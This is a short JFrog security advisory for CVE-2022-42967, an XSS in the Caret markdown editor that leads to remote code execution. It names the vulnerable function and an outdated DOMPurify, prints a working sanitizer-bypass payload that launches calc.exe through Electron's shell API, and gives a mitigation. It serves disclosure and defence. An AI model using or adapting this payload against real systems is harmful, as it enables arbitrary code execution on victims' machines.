JFrog Security Research

- Caret XSS RCE

CVE-2022-42967 | CVSS 7.5

JFrog Severity:high

Published 10 Jan. 2023 | Last updated 10 Jan. 2023

XSS in Caret markdown editor leads to remote code execution when viewing crafted Markdown files

Caret Editor

All versions are affected

This issue is caused due to insufficient validation of the document data, which is sent to the Electron renderer. Specifically, in the getMarkdownHtmlElement function in the file app.asar/extensions/Markdown/Markdown.js -

t.firstChild.innerHTML = DOMPurify.sanitize(r)

An older version of DOMPurify is used, which has known filtering bypasses (see below)

Opening a document with the following contents, when preview mode is enabled, leads to the immediate execution of an arbitrary process (in this case - Calculator) -

<form><math><mtext></form><form><mglyph><style></math><img src
onerror="try{ const {shell} = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">

Disable Caret's "Preview Mode"